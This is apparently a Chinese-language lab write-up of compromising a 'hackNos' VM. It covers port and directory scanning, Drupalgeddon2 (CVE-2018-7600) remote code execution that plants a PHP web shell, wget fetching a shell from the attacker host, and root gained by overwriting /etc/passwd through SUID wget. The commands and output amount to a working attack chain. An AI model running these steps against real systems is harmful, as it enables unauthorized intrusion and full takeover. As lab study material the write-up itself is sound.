实验环境:
靶机:192.168.0.10
攻击机kali:192.168.0.11
一、信息收集
1、masscan快速扫端口发现22,80端口。
root@kali:~# masscan -p0-65535 --rate=2000 192.168.0.10
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 11:31:19 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.0.10
Discovered open port 80/tcp on 192.168.0.10
2、nmap探测22,80端口的版本与漏洞
root@kali:~# nmap -sC -sV -p22,80 192.168.0.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 06:34 EST
Nmap scan report for 192.168.0.10
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a5:a5:17:70:4d:be:48:ad:ba:64:c1:07:a0:55:03:ea (RSA)
| 256 f2:ce:42:1c:04:b8:99:53:95:42:ab:89:22:66:9e:db (ECDSA)
|_ 256 4a:7d:15:65:83:af:82:a3:12:02:21:1c:23:49:fb:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:EA:58:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3、入手80端口,dirb扫目录,发现drupal。
root@kali:~# dirb http://192.168.0.10
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 15 06:35:33 2020
URL_BASE: http://192.168.0.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.10/ ----
==> DIRECTORY: http://192.168.0.10/drupal/
+ http://192.168.0.10/index.html (CODE:200|SIZE:11321)
+ http://192.168.0.10/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.0.10/drupal/ ----
==> DIRECTORY: http://192.168.0.10/drupal/includes/
+ http://192.168.0.10/drupal/index.php (CODE:200|SIZE:7647)
==> DIRECTORY: http://192.168.0.10/drupal/misc/
==> DIRECTORY: http://192.168.0.10/drupal/modules/
==> DIRECTORY: http://192.168.0.10/drupal/profiles/
+ http://192.168.0.10/drupal/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.0.10/drupal/scripts/
==> DIRECTORY: http://192.168.0.10/drupal/sites/
==> DIRECTORY: http://192.168.0.10/drupal/themes/
+ http://192.168.0.10/drupal/web.config (CODE:200|SIZE:2200)
+ http://192.168.0.10/drupal/xmlrpc.php (CODE:200|SIZE:42)
---- Entering directory: http://192.168.0.10/drupal/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
4、whatweb查看版本信息,大致确定drupal 7版本。
root@kali:~# whatweb http://192.168.0.10/drupal/
http://192.168.0.10/drupal/ [200 OK] Apache[2.4.18], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.10], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], Script[text/javascript], Title[Welcome to james | james], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN]
5、gobuster扫根目录/和/drupal目录下的txt文件。得到/alexander.txt和/drupal//CHANGELOG.txt两个敏感信息文件。通过CHANGELOG.txt文件判定drupal版本号为drupal 7.57。
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10 -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.0.10
[+] Threads: 100
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/02/15 06:46:33 Starting gobuster
===============================================================
/drupal (Status: 301)
/alexander.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/02/15 06:47:31 Finished
===============================================================
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10/drupal/ -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.0.10/drupal/
[+] Threads: 100
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/02/15 06:47:40 Starting gobuster
===============================================================
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/includes (Status: 301)
/sites (Status: 301)
/profiles (Status: 301)
/README.txt (Status: 200)
/robots.txt (Status: 200)
/INSTALL.txt (Status: 200)
/LICENSE.txt (Status: 200)
/CHANGELOG.txt (Status: 200)
/COPYRIGHT.txt (Status: 200)
/UPGRADE.txt (Status: 200)
===============================================================
2020/02/15 06:48:42 Finished
===============================================================
二、getshell
1、使用msf的exploit/unix/webapp/drupal_drupalgeddon2模块,set options中注意TARGETURI参数默认为/,应当改为drupal安装目录,此处为/drupal,run后得到一个msf的shell。
2、手动获取shell:在exploit-db上找到记录2018-04-13 Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution WebApps PHP Hans Topo & g0tmi1k,按照提示运行得到shell,后可以通过python反弹shell,注意此处bash反弹会报错。
root@kali:~# gem install highline #安装rb依赖包higline
root@kali:~# git clone https://github.com/dreadlocked/Drupalgeddon2.git
root@kali:~/Drupalgeddon2# ls
drupalgeddon2-customizable-beta.rb drupalgeddon2.rb README.md
root@kali:~/Drupalgeddon2# ./drupalgeddon2.rb http://192.168.0.10/drupal/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.0.10/drupal/
--------------------------------------------------------------------------------
[+] Found : http://192.168.0.10/drupal/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.57
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo SEFWERIV
[+] Result : SEFWERIV
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://192.168.0.10/drupal/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://192.168.0.10/drupal/shell.php' -d 'c=hostname'
hackNos>>
3、在github上搜drupal 7.57出python利用版本。-c参数执行命令,可以使用wget拉一个马过来反弹shell。
root@kali:~# https://github.com/pimps/CVE-2018-7600.git
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "whoami"
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-y-Nt9_xZdA7YysBlakHYAmSIgsMMYKL2A4sB2nfMTdE
[*] Triggering exploit to execute: whoami
www-data
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "wget http://192.168.0.11/phpshell.txt -O phpshell.php"
三、提权
1、使用LinEnum.sh工具,找到Possibly interesting SUID files:wget。
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hackNos:/$
www-data@hackNos:/tmp$ git clone https://github.com/rebootuser/LinEnum.git
www-data@hackNos:/tmp/LinEnum$ ./LinEnum.sh
[-] SUID files:
-rwsr-xr-x 1 root root 159852 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 34680 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 36288 May 17 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 506200 May 9 2018 /usr/bin/wget
-rwsr-xr-x 1 root root 53128 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39560 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48264 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 26492 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 157424 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 34812 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 38900 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 506200 May 9 2018 /usr/bin/wget
将靶机的/etc/passwd文件下载回kali本机。使用openssl命令生成密码。
root@kali:~# openssl passwd -1 -salt suijishu 123456
$1$suijishu$pCi13H6xgVMoQBkitx4rg/
root@kali:~#echo 'hack:$1$suijishu$pCi13H6xgVMoQBkitx4rg/:0:0:root:/root:/bin/bash' >> passwd
在靶机上执行wget,覆盖靶机的/etc/passwd,然后su到hack,提权成功。
www-data@hackNos:/tmp$ wget http://192.168.0.11/passwd -O /etc/passwd
/etc/passwd 100%[===================>] 1.65K --.-KB/s in 0.002s
2020-02-15 18:48:32 (764 KB/s) - '/etc/passwd' saved [1685/1685]
www-data@hackNos:/tmp$ su - hack
su - hack
Password: 123456
root@hackNos:~#
四、花絮
1、关于文件alexander.txt,可以echo | base64 -d解密后,再到解密网站解密得到james:Hacker@4514,测试后发现无法登陆。
root@hackNos:/var/www/html# cat alexander.txt
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==
root@hackNos:/var/www/html# echo 'KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==' | base64 -d
<tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==' | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+++.
2、在kali攻击靶机使用python快速搭建web服务器
root@kali:~# python -m SimpleHTTPServer 80 &
[2] 4963
[1] Killed python -m SimpleHTTPServer 80
root@kali:~# Serving HTTP on 0.0.0.0 port 80 ...
192.168.0.22 - - [15/Feb/2020 08:34:22] "GET / HTTP/1.1" 200 -
192.168.0.22 - - [15/Feb/2020 08:34:31] "GET /shell.txt HTTP/1.1" 200 -
3、两条使用find查找suid的命令
www-data@hackNos:/tmp$ find / -user root -perm -4000 -print 2>/dev/null #-perm -4000包含4000的所有文件
www-data@hackNos:/tmp$ find / -perm -u=s -type f 2>/dev/null #-u=s 包含u=s条件的所有文件
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pkexec
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/wget